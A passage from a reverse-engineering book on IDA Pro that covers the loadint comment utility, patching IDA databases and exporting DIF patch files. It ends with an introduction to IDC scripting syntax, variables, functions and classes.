The loadint4 utilities provide you with the ability to modify existing

comments or add new comments to ida.int. As with the other add-on utilities

we have discussed, loadint is documented in a readme.txt file included with the

loadint distribution. The loadint distribution also contains the predefined

4. The current version is loadint61.zip.

234 Chapter 13

comments for all of IDA’s processor modules in the form of numerous .cmt

files. Modifying existing comments is a simple matter of locating the comment

file associated with your processor of interest (for example, pc.cmt for x86),

making changes to any comments whose text you wish to modify, running

loadint to re-create the ida.int comment file, and finally copying the resulting

ida.int file into your main IDA directory, where it will be loaded the next time

IDA is launched. A simple run to rebuild the comment database looks like

the following:

$ ./loadint comment.cmt ida.int

17566 cases, 17033 strings, total length: 580575

Examples of changes that you might wish to make include modifying exist-

ing comments or enabling comments for instructions that have no assigned

comment. In the pc.cmt file, for example, several of the more common instruc-

tions are commented out so as not to generate too many comments when

auto comments are enabled. The following lines, extracted from pc.cmt,

demonstrate that x86 mov instructions do not generate comments by default:

NN_ltr: "Load Task Register"

//NN_mov: "Move Data"

NN_movsp: "Move to/from Special Registers"

Should you wish to enable comments for mov instructions, you would

uncomment the middle line and rebuild the comment database as detailed

previously.

A note buried within the documentation for loadint points out that

loadint must be able to locate the file ida.hlp, which is included with your IDA

distribution. If you receive the following error message, you should copy

ida.hlp into your loadint directory and then rerun loadint.

$ ./loadint comment.cmt ida.int

Can't initialize help system.

File name: 'ida.hlp', Reason: can't find file (take it from IDA distribution).

Alternatively, you may use the -n switch with loadint to specify the location

of <IDADIR>, as shown in the following command line:

$ ./loadint -n <IDADIR> comment.cmt ida.int

The file comment.cmt serves as the master input file to the loadint process.

The syntax for this file is described in the loadint documentation. In a nutshell,

comment.cmt creates the mappings from processor types to associated comment

files. Individual processor-specific comment files in turn specify the mappings

from specific instructions to the associated comment text for each instruction.

Extending IDA’s Knowledge 235

The entire process is governed by several sets of enumerated (C-style enums)

constants that define all of the processor types (found in comment.cmt) and all

of the possible instructions for each processor (found in allins.hpp).

If you want to add predefined comments for a completely new processor

type, the process is somewhat more involved than simply changing existing

comments and is fairly closely linked to the process for creating new processor

modules (see Chapter 19). Without diving too deeply into processor modules,

providing comments for a completely new processor type requires that you

first create a new enumerated constant set (shared with your processor

module) within allins.hpp that defines one constant for each instruction in

the instruction set of interest. Second, you must create a comment file that

maps each enumerated instruction constant to its associated comment text.

Third, you must define a new constant for your processor type (again, shared

with your processor module) and create an entry in comment.cmt that maps

your processor type to its associated comment file. Once you have completed

these steps, you must run loadint to build a new comment database that

incorporates your new processor type and associated comments.

Summary

While idsutils and loadint may not seem immediately useful to you, you will

learn to appreciate their capabilities once you begin to step outside IDA’s

more common use cases. For a relatively small investment of time, the creation

of a single .ids or .til file can save you countless hours whenever you encounter

the libraries described by those files in future projects. Keep in mind that it

is not possible for IDA to ship with descriptions for every library in existence.

The intended purpose of the tools covered in this chapter is to provide you

with the flexibility to address gaps in IDA’s library coverage whenever you

stray off IDA’s beaten path.

JMP

EBP

SUB

PATCHING BINARIES AND

OTHER IDA LIMITATIONS

One of the most frequently asked questions

by new or prospective IDA users is “How

can I use IDA to patch binaries?” The simple

answer is “You can’t.” IDA’s intended purpose

is to assist you in understanding the behavior of a binary

by offering you the best disassembly possible. IDA is not

designed to make it easy for you to modify the binaries you are examining.

Not wanting to take no for an answer, die-hard patchers often follow up with

questions such as “What about the EditPatch Program menu?” and “What

is the purpose of FileProduce FileCreate EXE File?” In this chapter we

discuss these apparent anomalies and see if we can’t coax IDA into helping

us, at least a little bit, with developing patches for binary program files.

238 Chapter 14

The Infamous Patch Program Menu

First mentioned in Chapter 11, the EditPatch Program menu is a hidden

feature in the GUI version of IDA that must be enabled by editing the

idagui.cfg configuration file (the Patch menu is available by default in

console versions of IDA). Figure 14-1 shows the options available on the

EditPatch Program submenu.

Figure 14-1: The Patch Program submenu

Each of the submenu items teases you with the notion that you are going

to be able to modify the binary in potentially interesting ways. In actuality,

what these options offer are three different ways to modify the database. In

fact, these menu items, perhaps more than any others, make perfectly clear

the distinction between an IDA database and the binary file from which the

database was created. Once a database is created, IDA never references the

original binary. Given its true behavior, this menu item would be more aptly

named Patch Database.

All is not completely lost, however, as the menu options in Figure 14-1

do offer you the easiest way to observe the effect of any changes that you might

eventually make to the original binary. Later in this chapter you will learn

how to export the changes you have made and eventually use that information

to patch the original binary.

Changing Individual Database Bytes

The EditPatch ProgramChange Byte menu option is used to edit one or

more byte values within an IDA database. Figure 14-2 shows the related byte-

editing dialog.

Figure 14-2: The Patch Bytes dialog

The dialog displays 16-byte values beginning at the current cursor loca-

tion. You may change some or all of the displayed bytes, but you cannot make

changes beyond the 16th byte without closing the dialog, repositioning the

cursor to a new location farther into the database, and reopening the dialog.

Patching Binaries and Other IDA Limitations 239

Note that the dialog displays the virtual address and the file offset value for

the bytes that you are changing. This File offset value reflects the hexa-

decimal offset at which the bytes reside within the original binary file. The

fact that IDA retains the original file offset information for every byte in the

database will be useful if you do wish to develop a patch for the original binary.

Finally, regardless of the number of changes that have been made to the bytes

in the database, the Original value field of the dialog always displays the orig-

inal byte values loaded into the database. There is no automated capability

for reverting changes to their original byte values, though it is possible to

create an IDA script to perform such a task.

A better method for editing database bytes was introduced in IDA 5.5

in the form of a more capable Hex View window (see Chapter 5). With an

integrated hex-editing capability, there is little need to use IDA’s change

bytes capability.

Changing a Word in the Database

Somewhat less useful than the byte-patching capability is IDA’s word-patching

capability. Figure 14-3 shows IDA’s Patch Word dialog, which is capable of

patching only one 2-byte word at a time.

Figure 14-3: The Patch Word dialog

As with the byte-patching dialog, the virtual address and file offset are

displayed. An important point to remember is that the word value is dis-

played using the natural byte ordering of the underlying processor. For

example, in an x86 disassembly, words are treated as little-endian values,

while in a MIPS disassembly, words are treated as big-endian values. Keep

this in mind when entering new word values. As with the byte-patching

dialog, the Original value field always displays the initial value loaded from

the original binary file regardless of the number of times the word value may

have been modified using the word-patching dialog. As with byte editing, it

may be easier to perform your editing within IDA’s Hex View window.

Using the Assemble Dialog

Perhaps the most interesting capability accessible from the Patch Program

menu is the Assemble option (EditPatch ProgramAssemble). Unfortu-

nately, this capability is not available for all processor types, as it relies on the

presence of an internal assembler capability within the current processor

module. For example, the x86 processor module is known to support assembly,

240 Chapter 14

while the MIPS processor module is known not to support assembly. When

an assembler is not available, you will receive an error message stating,

“Sorry, this processor module doesn’t support the assembler.”

The Assemble option allows you to enter assembly language statements

that are assembled using an internal assembler. The resulting instruction

bytes are then written to the current screen location. Figure 14-4 shows the

Assemble Instruction dialog used for instruction entry.

Figure 14-4: The Assemble Instruction dialog

You can enter one instruction at a time into the Instruction field. The

assembler component for IDA’s x86 processor module accepts the same

syntax used in x86 disassembly listings. When you click OK (or press ENTER),

your instruction is assembled, and the corresponding instruction bytes are

entered into the database beginning at the virtual address displayed in the

Address field. The internal IDA assembler allows you to use symbolic names

within your instructions as long as those names exist within the program.

Syntax such as mov [ebp+var_4], eax and call sub_401896 is perfectly legal,

and the assembler will correctly resolve symbolic references.

Following entry of an instruction, the dialog remains open and ready to

accept a new instruction at the virtual address immediately following the

previously entered instruction. While you enter additional instructions, the

dialog displays the previous instruction entered in the Previous line field.

When entering new instructions, you must pay attention to instruction

alignment, especially when the instruction that you are entering is a different

length than the instruction it is replacing. When a new instruction is shorter

than the instruction it is replacing, you need to consider what to do with the

excess bytes left over from the old instruction (inserting NOP1 instructions is

one possible option). When a new instruction is longer than the instruction

that it is replacing, IDA will overwrite as many bytes of subsequent instructions

as is required to fit the new instruction. This may or may not be the behavior

you want, which is why careful planning is necessary before using the assembler

to modify program bytes. One way to view the assembler is as a word processor

that is stuck in overwrite mode. There is no easy way to open up space to

insert new instructions without overwriting existing instructions.

It is important to remember that IDA’s database-patching capabilities

are limited to small, simple patches that easily fit into existing space within

the database. If you have a patch that requires substantial additional space,

you will need to locate space that is allocated within the original binary but

not used by the binary. Such space is often present in the form of padding,

1. NOP stands for no operation and is an instruction often used simply to fill in space in a program.

Patching Binaries and Other IDA Limitations 241

inserted by compilers to align sections of a binary to particular file boundaries.

For example, in many Windows PE files, individual program sections must

begin at file offsets that are multiples of 512 bytes. When a section does not

consume an even multiple of 512 bytes of space, that section must be padded

within the file in order to maintain a 512-byte boundary for the next section.

The following lines from a disassembled PE file demonstrate this situation:

.text:0040963E ; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]

.text:00409644 Xalign 200h

.text:00409644 _text ends

.text:00409644

.idata:0040A000 ; Section 2. (virtual address 0000A000)

In this case, IDA is using an align directive X to indicate that the section is

padded to a 512-byte (200h) boundary beginning from address .text:00409644.

The upper end of the padding is the next multiple of 512 bytes, or .text:

00409800. The padded area is generally filled with zeros by the compiler and

stands out quite prominently in hex view. In this particular binary, there is

space within the file to insert up to 444 (0x1BC = 409800h – 409644h) bytes

of patched program data, which would overwrite some or all of the zero

padding at the end of the .text section. You might patch a function to jump

to this area of the binary, execute the newly inserted program instructions,

and then jump back to the original function.

Note that the next section in the binary, the .idata section, does not

actually begin until address .idata:0040A000. This is a result of a memory-

(not file-) alignment restriction that requires PE sections to begin in 4Kb

(one memory page) boundaries. In theory it should be possible to inject an

additional 2,048 bytes of patched data into the memory range 00409800-0040A000.

The difficulty in doing so lies in the fact that no bytes corresponding to this

memory range are present within the disk image of the executable. In order

to use this space, we would need to perform more than a simple overwrite of

portions of the original binary file. First we would need to insert a 2,048-byte

block of data between the end of the existing .text section and the beginning

of the .idata section. Second, we would need to adjust the size of the .text

section within the PE file headers. Finally, we’d need to adjust the location of

.idata and all subsequent sections within the PE headers to reflect the fact

that all following sections are now located 2,048 bytes deeper into the file.

These changes may not sound terribly complicated, but they require some

attention to detail and a good working knowledge of the PE file format.

IDA Output Files and Patch Generation

One of the more interesting menu options in IDA is the FileProduce File

menu. According to the options on this menu, IDA can generate MAP, ASM,

INC, LST, EXE, DIF, and HTML files. Many of these sound intriguing, so

each is described in the following sections.

242 Chapter 14

IDA-Generated MAP Files

A .map file describes the overall layout of a binary, including information about

the sections that make up the binary and the location of symbols within each

section. When generating a .map file, you are asked for the name of the file

you wish to create and the types of symbols you would like to store in the .map

file. Figure 14-5 shows the MAP file options dialog, in which you select the

information you wish to include in the .map file.

Figure 14-5: MAP file-

generation options

Address information in a .map file is represented using logical addresses.

A logical address describes a symbol’s location using a segment number and

a segment offset. The first few lines of a simple .map file are shown in the

following listing. In this listing we show three segments and the first two of

many symbols. The logical address of _fprintf indicates that it resides at byte

offset 69h within the first (.text) segment.

Start Length Name Class

0001:00000000 000008644H .text CODE

0002:00000000 000001DD6H .rdata DATA

0003:00000000 000002B84H .data DATA

Address Publics by Value

0001:00000000 _main

0001:00000069 _fprintf

MAP files generated by IDA are compatible with Borland’s Turbo

Debugger. The principle purpose of .map files is to assist in restoring symbol

names when debugging binaries that may have been stripped.

IDA-Generated ASM Files

IDA can generate a .asm file from the current database. The general idea is

to create a file that could be run through an assembler to re-create the under-

lying binary file. IDA attempts to dump enough information, including such

things as structure layouts, to make successful assembly possible. Whether

Patching Binaries and Other IDA Limitations 243

you will be able to successfully assemble the generated .asm file depends on

a number of factors, not the least of which is whether your particular assembler

understands the syntax IDA uses.

The target assembly language syntax is determined by the Target

assembler setting found on the Analysis tab under the OptionsGeneral

menu. By default IDA generates an assembly file representing the entire

database. However, you may limit the scope of the listing by clicking and

dragging or using SHIFT-up arrow or SHIFT-down arrow to scroll and select the

region you wish to dump. In console versions of IDA, you would utilize the

Anchor (ALT-L) command to set an anchor point at the start of a selection

region and then use the arrow keys to extend the size of the region.

IDA-Generated INC Files

An INC (include) file contains definitions of data structures and enumerated

datatypes. This is essentially a dump of the contents of the Structures windows

in a form suitable for consumption by an assembler.

IDA-Generated LST Files

An LST file is nothing more than a text file dump of the contents of the IDA

disassembly window. You can narrow the scope of the generating listing by

selecting a range of addresses to dump, as described previously for ASM files.

IDA-Generated EXE Files

While this is the most promising menu option, it unfortunately is also the

most crippled. In a nutshell, it doesn’t work for most file types, and you can

expect to receive an error message stating, “This type of output file is not

supported.”

While this would be an ideal capability for a patcher, in general it is very

difficult to regenerate executable files from an IDA database. The infor-

mation that you are presented with in an IDA database is comprised primarily

of the contents of the sections that make up the original input file. In many

cases, however, IDA does not process every section of an input file, and certain

information is lost when the file is loaded into the database, making genera-

tion of an executable from the database impossible. The simplest example of

such loss is the fact that IDA does not load the resource (.rsrc) section of PE

files by default, which makes restoration of the resource section from the

database impossible.

In other cases, IDA processes information from the original binary but

does not make it easily accessible in its original form. Examples include

symbol tables, import tables, and export tables, which would require a fair

amount of effort to properly reconstruct in order to generate a functional

executable file.

244 Chapter 14

One effort to provide an EXE-generation capability for IDA is the

pe_scripts2 of Atli Mar Gudmundsson. These are a set of IDA scripts for

working with PE files. One of the scripts is titled pe_write.idc, and its goal is to

dump a working PE image out of an existing database. If you intend to patch

a PE file, the proper sequence of events for using the scripts is as follows:

1. Load the desired PE file into IDA. Make sure that you uncheck the Make

imports section option in the loader dialog.

2. Run the included pe_sections.idc script to map all sections from the original

binary into the new database.

3. Make any desired changes to the database.

4. Execute the pe_write.idc script to dump the database contents to a new

PE file.

Scripting with IDC is the subject of Chapter 15.

IDA-Generated DIF Files

An IDA DIF file is a plaintext file that lists all bytes that have been modified

within an IDA database. This is the most useful file format if your goal is to

patch an original binary based on changes made to an IDA database. The

format of the file is quite simple, as shown in the example .dif file here:

This difference file is created by The Interactive Disassembler

dif_example.exe

000002F8: 83 FF

000002F9: EC 75

000002FA: 04 EC

000002FB: FF 68

The file includes a one-line header comment followed by the name of

the original binary file and then a list of bytes within the file that have changed.

Each change line specifies the file offset (not virtual address) of the changed

byte, the original value of the byte, and the current value of the byte within

the database. In this example, the database for dif_example.exe has been

modified at four locations corresponding to byte offsets 0x2F8–0x2FB within

the original file. It is a trivial task to write a program to parse IDA .dif files

and apply the changes to the original binary file to generate a patched

version of the binary. One such utility is available at the companion website

for this book.3

2. See http://www.hex-rays.com/idapro/freefiles/pe_scripts.zip.

3. See http://www.idabook.com/chapter14/ida_patcher.c.

Patching Binaries and Other IDA Limitations 245

IDA-Generated HTML Files

IDA takes advantage of the markup capabilities available with HTML in order

to generate colorized disassembly listings. An IDA-generated HTML file is

essentially an LST file with HTML tags added to produce a listing that is

colored similarly to the actual IDA disassembly window. Unfortunately, the

generated HTML files do not contain any hyperlinks that would make

navigating the file any easier than if one used a standard text listing. For

example, one useful feature would be the addition of hyperlinks to all name

references, which would make following name references as simple as

following a link.

Summary

IDA is not a binary file editor. Keep that fact in mind anytime you think about

patching a binary with IDA. However, it is a particularly good tool for helping

you enter and visualize potential changes. By familiarizing yourself with IDA’s

full range of features and combining the information that IDA can generate

with appropriate scripts or external programs, binary patching easily becomes

possible.

In the coming chapters, we will cover the many ways in which IDA’s

capabilities can be extended. For anyone interested in making the most

out of IDA’s capabilities, basic scripting skills and an understanding of IDA’s

plug-in architecture are essential, as they offer you the capability to add

behaviors wherever you feel IDA is lacking.

PART IV

EXTENDING IDA’S

CAPABILITIES

JMP

EBP

SUB

IDA SCRIPTING

It is a simple fact that no application can

meet every need of every user. It is just not

possible to anticipate every potential use case

that may arise. Application developers are faced

with the choice of responding to an endless stream of

feature requests or offering users a means to solve

their own problems. IDA takes the latter approach by integrating scripting

features that allow users to exercise a tremendous amount of programmatic

control over IDA’s actions.

Potential uses for scripts are infinite and can range from simple one-

liners to full-blown programs that automate common tasks or perform com-

plex analysis functions. From an automation standpoint, IDA scripts can be

viewed as macros,1 while from an analysis point of view, IDA’s scripting lan-

guages serve as the query languages that provide programmatic access to

the contents of an IDA database. IDA supports scripting using two different

1. Many applications offer facilities that allow users to record sequences of actions into a single

complex action called a macro. Replaying or triggering a macro causes the entire sequence of

recorded steps to be executed. Macros provided an easy means to automate a complex series

of actions.

250 Chapter 15

languages. IDA’s original, embedded scripting language is named IDC, per-

haps because its syntax bears a close resemblance to C. Since the release

of IDA 5.4,2 integrated scripting with Python has also been supported

through the integration of the IDAPython plug-in by Gergely Erdelyi.3 For

the remainder of this chapter we will cover the basics of writing and execut-

ing both IDC and Python scripts as well as some of the more useful functions

available to script authors.

Basic Script Execution

Before diving into the details of either scripting language, it is useful to

understand the most common ways that scripts can be executed. Three

menu options, FileScript File, FileIDC Command, and FilePython

Command4 are available to access IDA’s scripting engine. Selecting File

Script File indicates that you wish to run a standalone script, at which point

you are presented with a file-selection dialog that lets you choose the script

to run. Each time you run a new script, the program is added to a list of

recent scripts to provide easy access to edit or rerun the script. Figure 15-1

shows the Recent Scripts window accessible via the ViewRecent Scripts

menu option.

Figure 15-1: The Recent Scripts window

Double-clicking a listed script causes the script to be executed. A pop-up,

context-sensitive menu offers options to remove a script from the list or to

open a script for editing using the editor specified under OptionsGeneral

on the Misc tab.

As an alternative to executing a standalone script file, you may elect to

open a script entry dialog using FileIDC Command or FilePython Com-

mand. Figure 15-2 shows the resulting script entry dialog (for an IDC script

in this case), which is useful in situations where you wish to execute only a

few statements but don’t want to go to the trouble of creating a standalone

script file.

2. For a comprehensive list of features introduced with each new version of IDA, visit http://

www.hex-rays.com/idapro/idanew48.htm.

3. See http://code.google.com/p/idapython/.

4. This option is only available if Python is properly installed. Refer to Chapter 3 for details.

IDA Scripting 251

Figure 15-2: The script entry dialog

Some restrictions apply to the types of statements that you can enter in

the script dialog, but the dialog is very useful in cases where creating a full-

blown script file is overkill.

The last way to easily execute script commands is to use IDA’s command

line. The command line is available only in GUI versions of IDA, and its pres-

ence is controlled by the value of the DISPLAY_COMMAND_LINE option in <IDADIR>/

cfg/idagui.cfg. The command line has been enabled by default since IDA 5.4.

Figure 15-3 shows the command line as it appears in the lower-left corner of

the IDA workspace, beneath the output window.

Figure 15-3: The IDA command line

The interpreter that will be used to execute the command line is labeled

to the left of the command-line entry box. In Figure 15-3, the command line

is configured to execute IDC statements. Clicking this label opens the pop-

up menu shown in Figure 15-3, allowing either interpreter (IDC or Python)

to be associated with the command line.

Although the command line contains only a single line of text, you can

enter multiple statements by separating each statement with a semicolon.

As a convenience, the history of recent commands is accessible with the up

arrow key. If you find yourself frequently needing to execute very short

scripts, you will find the command line very useful.

With a basic ability to execute scripts under our belts, it is time to focus

on the specifics of IDA’s two available scripting languages, IDC and Python.

We begin with a description of IDA’s native scripting language, IDC, and

conclude with a discussion of IDA’s Python integration, which will rely

heavily on the foundation built by the IDC sections that follow.

252 Chapter 15

The IDC Language

Unlike for some other aspects of IDA, a reasonable amount of help is avail-

able for the IDC language in IDA’s help system. Topics available at the top

level of the help system include IDC language, which covers the basics of IDC

syntax, and Index of IDC functions, which provides an exhaustive list of built-in

functions available to IDC programmers.

IDC is a scripting language that borrows most of its syntactic elements

from C. Beginning with IDA 5.6, IDC actually takes on more of the flavor of

C++ with the introduction of object-oriented features and exception handling.

Because of its similarity to C and C++, we will describe IDC in terms of these

languages and focus primarily on where IDC differs.

IDC Variables

IDC is a loosely typed language, meaning that variables have no explicit type.

The three primary datatypes used in IDC are integers (IDA documentation

uses the type name long), strings, and floating point values, with the over-

whelming majority of operations taking place on integers and strings. Strings

are treated as a native datatype in IDC, and there is no need to keep track of

the space required to store a string or whether a string is null terminated or

not. Beginning with IDA 5.6, IDC incorporates a number of additional vari-

able types, including objects, references, and function pointers.

All variables must be declared prior to their use. IDC supports local vari-

ables and, since IDA 5.4, global variables as well. The IDC keyword auto is

used to introduce a local variable declaration, and local variable declarations

may include initial values. The following examples show legal IDC local vari-

able declarations:

auto addr, reg, val; // legal, multiple variables declared with no initializers

auto count = 0; // declaration with initialization

IDC recognizes C-style multiline comments using /* */ and C++–style

line-terminating comments using //. Also, note that several variables may be

declared in a single statement and that all statements in IDC are terminated

using a semicolon (as in C). IDC does not support C-style arrays (slices are

introduced in IDA 5.6), pointers (though references are supported begin-

ning with IDA 5.6), or complex datatypes such as structs and unions. Classes

are introduced in IDA 5.6.

Global variable declarations are introduced using the extern keyword,

and their declarations are legal both inside and outside of any function

definition. It is not legal to provide an initial value when a global variable is

declared. The following listing shows the declaration of two global variables.

IDA Scripting 253

extern outsideGlobal;

static main() {

extern insideGlobal;

outsideGlobal = "Global";

insideGlobal = 1;

}

Global variables are allocated the first time they are encountered during

an IDA session and persist as long as that session remains active, regardless of

the number of databases that you may open and close.

IDC Expressions

With a few exceptions, IDC supports virtually all of the arithmetic and logical

operators available in C, including the ternary operator (? :). Compound

assignment operators of the form op= (+=, *=, >>=, and the like) are not sup-

ported. The comma operator is supported beginning with IDA 5.6. All inte-

ger operands are treated as signed values. This affects integer comparisons

(which are always signed) and the right-shift operator (>>), which always per-

forms an arithmetic shift with sign bit replication. If you require logical right

shifts, you must implement them yourself by masking off the top bit of the

result, as shown here:

result = (x >> 1) & 0x7fffffff; //set most significant bit to zero

Because strings are a native type in IDC, some operations on strings take

on a different meaning than they might in C. The assignment of a string

operand into a string variable results in a string copy operation; thus there is

no need for string copying or duplicating functions such as C’s strcpy and

strdup. Also, the addition of two string operands results in the concatenation

of the two operands; thus “Hello” + “World” yields “HelloWorld”; there is no

need for a concatenation function such as C’s strcat. Starting with IDA 5.6,

IDC offers a slice operator for use with strings. Python programmers will be

familiar with slices, which basically allow you to specify subsequences of array-

like variables. Slices are specified using square brackets and a start (inclusive)

and end (exclusive) index. At least one index is required. The following list-

ing demonstrates the use of IDC slices.

auto str = "String to slice";

auto s1, s2, s3, s4;

s1 = str[7:9]; // "to"

s2 = str[:6]; // "String", omitting start index starts at 0

s3 = str[10:]; // "slice", omitting end index goes to end of string

s4 = str[5]; // "g", single element slice, similar to array element access

Note that while there are no array datatypes available in IDC, the slice

operator effectively allows you to treat IDC strings as if they were arrays.

254 Chapter 15

IDC Statements

As in C, all simple statements are terminated with a semicolon. The only C-

style compound statement that IDC does not support is the switch statement.

When using for loops, keep in mind that IDC does not support compound

assignment operators, which may affect you if you wish to count by anything

other than one, as shown here:

auto i;

for (i = 0; i < 10; i += 2) {} // illegal, += is not supported

for (i = 0; i < 10; i = i + 2) {} // legal

With IDA 5.6, IDC introduces try/catch blocks and the associated throw

statement, which are syntactically similar to C++ exceptions.5 IDA’s built-in

help contains specifics on IDC’s exception-handling implementation.

For compound statements, IDC utilizes the same bracing ({}) syntax and

semantics as C. Within a braced block, it is permissible to declare new variables

as long as the variable declarations are the first statements within the block.

However, IDC does not rigorously enforce the scope of the newly introduced

variables, because such variables may be referenced beyond the block in which

they were declared. Consider the following example:

if (1) { //always true

auto x;

x = 10;

}

else { //never executes

auto y;

y = 3;

}

Message("x = %d\n", x); // x remains accessible after its block terminates

Message("y = %d\n", y); // IDC allows this even though the else did not execute

The output statements (the Message function is analogous to C’s printf)

will inform us that x = 10 and y = 0. Given that IDC does not strictly enforce

the scope of x, it is not terribly surprising that we are allowed to print the

value of x. What is somewhat surprising is that y is accessible at all, given that

the block in which y is declared is never executed. This is simply a quirk of

IDC. Note that while IDC may loosely enforce variable scoping within a func-

tion, variables declared within one function continue to remain inaccessible

in any other function.

IDC Functions

IDC supports user-defined functions in standalone programs (.idc files) only.

User-defined functions are not supported when using the IDC command dia-

log (see “Using the IDC Command Dialog” on page 255). IDC’s syntax for

declaring user-defined functions is where it differs most from C. The static

5. See http://www.cplusplus.com/doc/tutorial/exceptions/.

IDA Scripting 255

keyword is used to introduce a user-defined function, and the function’s

parameter list consists solely of a comma-separated list of parameter names.

The following listing details the basic structure of a user-defined function:

static my_func(x, y, z) {

//declare any local variables first

auto a, b, c;

//add statements to define the function's behavior

// ...

}

Prior to IDA 5.6, all function parameters are strictly call-by-value. Call-by-

reference parameter passing was introduced with IDA 5.6. Interestingly,

whether a parameter is passed using call-by-value or call-by-reference is deter-

mined by the manner in which the function is called, not the manner in

which the function is declared. The unary & operator is used in a function

call (not the function declaration) to denote that an argument is being

passed by reference. The following examples show invocations of the my_func

function from the previous listing making use of both call-by-value and call-

by-reference parameter passing.

auto q = 0, r = 1, s = 2;

my_func(q, r, s); //all three arguments passed using call-by-value

//upon return, q, r, and s hold 0, 1, and 2 respectively

my_func(q, &r, s); //q and s passed call-by-value, r is passed call-by-reference

//upon return, q, and s hold 0 and 2 respectively, but r may have

//changed. In this second case, any changes that my_func makes to its

//formal parameter y will be reflected in the caller as changes to r

Function declarations never indicate whether a function explicitly returns

a value or what type of value is returned when a function does yield a result.

When you wish to return a value from a function, use a return statement

to return the desired value. It is permissible to return entirely different data-

types from different paths of execution within a function. In other words, a

function may return a string in some cases, while in other cases the same

USING THE IDC COMMAND DIALOG

The IDC command dialog offers a simple interface for entering short sequences of

IDC code. The command dialog is a great tool for rapidly entering and testing new

scripts without the hassle of creating a standalone script file. The most important

thing to keep in mind when using the command dialog is that you must not define

any functions inside the dialog. In essence, IDA wraps your statements within a func-

tion and then calls that function in order to execute your statements. If you were to

define a function within the dialog, the net effect would be a function defined within

a function, and since nested function declarations are not allowed in IDC (or in C for

that matter), a syntax error would result.

256 Chapter 15

function may return an integer. As in C, use of a return statement within

a function is optional. However, unlike C, any function that does not explic-

itly return a value implicitly returns the value zero.

As a final note, beginning with IDA 5.6, functions take a step closer to

becoming first-class objects in IDC. It is now possible to pass function refer-

ences as arguments to other functions and return function references as the

result of a function. The following listing demonstrates the use of function

parameters and functions as return values.

static getFunc() {

return Message; //return the built-in Message function as a result

}

static useFunc(func, arg) { //func here is expected to be a function reference

func(arg);

}

static main() {

auto f = getFunc();

f("Hello World\n"); //invoke the returned function f

useFunc(f, "Print me\n"); //no need for & operator, functions always call-by-reference

}

IDC Objects

Another feature introduced in IDA 5.6 is the ability to define classes and, as a

result, have variables that represent objects. In the discussion that follows, we

assume that you have some familiarity with an object-oriented programming

language such as C++ or Java.

IDC defines a root class named object from which all classes ultimately

derive, and single inheritance is supported when creating new classes. IDC

does not make use of access specifiers such as public and private; all class

members are effectively public. Class declarations contain only the defini-

tions of the class’s member functions. In order to create data members

within a class, you simply create an assignment statement that assigns a

value to the data member. The following listing will help to clarify.

IDA SCRIPTING EVOLVES

If you haven’t gotten the idea that a large number of changes to IDC were intro-

duced with IDA 5.6, then you haven’t been paying attention. Following the integra-

tion of IDAPython in IDA 5.4, Hex-Rays looked to rejuvenate IDC, resulting in many

of the features mentioned in this chapter being introduced in IDA 5.6. Along the

way, JavaScript was even contemplated as a potential addition to IDA’s scripting

lineup.*

*See http://www.hexblog.com/?p=101.

IDA Scripting 257

class ExampleClass {

ExampleClass(x, y) { //constructor

this.a = x; //all ExampleClass objects have data member a

this.b = y; //all ExampleClass objects have data member b

}

~ExampleClass() { //destructor

}

foo(x) {

this.a = this.a + x;

}

//... other member functions as desired

};

static main() {

ExampleClass ex; //DON’T DO THIS!! This is not a valid variable declaration

auto ex = ExampleClass(1, 2); //reference variables are initialized by assigning

//the result of calling the class constructor

ex.foo(10); //dot notation is used to access members

ex.z = "string"; //object ex now has a member z, BUT the class does not

}

For more information on IDC classes and their syntax, refer to the

appropriate section within IDA’s built-in help file.

IDC Programs

For any scripting applications that require more than a few IDC statements,

you are likely to want to create a standalone IDC program file. Among other

things, saving your scripts as programs gives you some measure of persistence

and portability.

IDC program files require you to make use of user-defined functions. At

a minimum, you must define a function named main that takes no arguments.

In most cases, you will also want to include the file idc.idc in order to pick up

useful macro definitions that it contains. The following listing details the

components of a minimal IDC program file:

#include <idc.idc> // useful include directive

//declare additional functions as required

static main() {

//do something fun here

}

IDC recognizes the following C-style preprocessor directives:

#include <file>

Includes the named file in the current file.

#define <name> [optional value]

Creates a macro named name and optionally assigns it the specified

value. IDC predefines a number of macros that may be used to test vari-

ous aspects of your script’s execution environment. These include _NT_,

258 Chapter 15

_LINUX_, _MAC_, _GUI_, and _TXT_ among others. See the Predefined

symbols section of the IDA help file for more information on these and

other symbols.

#ifdef <name>

Tests for the existence of the named macro and optionally processes any

statements that follow if the named macro exists.

#else

Optionally used in conjunction with an #ifdef to provide an alternative

set of statements to process in the event the named macro does not exist.

#endif

This is a required terminator for an #ifdef or #ifdef/#else block.

#undef <name>

Deletes the named macro.

Error Handling in IDC

No one is ever going to praise IDC for its error-reporting capabilities. There

are two types of errors that you can expect to encounter when running IDC

scripts: parsing errors and runtime errors.

Parsing errors are those errors that prevent your program from ever being

executed and include such things as syntax errors, references to undefined

variables, and supplying an incorrect number of arguments to a function.

During the parsing phase, IDC reports only the first parsing error that it

encounters. In some cases, error messages correctly identify both the loca-

tion and the type of an error (hello_world.idc,20: Missing semicolon), while

in other cases, error messages offer no real assistance (Syntax error near:

<END>). Only the first error encountered during parsing is reported. As a

result, in a script with 15 syntax errors, it may take 15 attempts at running

the script before you are informed of every error.

Runtime errors are generally encountered less frequently than parsing

errors. When encountered, runtime errors cause a script to terminate imme-

diately. One example of a runtime error results from an attempt to call an

undefined function that for some reason is not detected when the script

is initially parsed. Another problem arises with scripts that take an excessive

amount of time to execute. Once a script is started, there is no easy way to

terminate the script if it inadvertently ends up

in an infinite loop or simply takes longer to

execute than you are willing to wait. Once a

script has executed for more than two to three

seconds, IDA displays the dialog shown in Fig-

ure 15-4.

This dialog is the only means by which you

can terminate a script that fails to terminate

properly.

Figure 15-4: Script

cancellation dialog

IDA Scripting 259

Debugging is another of IDC’s weak points. Other than liberal use of

output statements, there is no way to debug IDC scripts. With the introduc-

tion of exception handling (try/catch) in IDA 5.6, it does become possible

to build more robust scripts that can terminate or continue as gracefully as

you choose.

Persistent Data Storage in IDC

Perhaps you are the curious type who, not trusting that we would provide suf-

ficient coverage of IDA’s scripting capability, raced off to see what the IDA

help system has to say on the subject. If so, welcome back, and if not, we

appreciate you sticking with us this far. In any case, somewhere along the way

you may have acquired knowledge that claims that IDC does in fact support

arrays, in which case you must surely be questioning the quality of this book.

We urge you to give us a chance to sort out this potential confusion.

As mentioned previously, IDC does not support arrays in the traditional

sense of declaring a large block of storage and then using a subscript notation

to access individual items within that block. However, IDA’s documentation

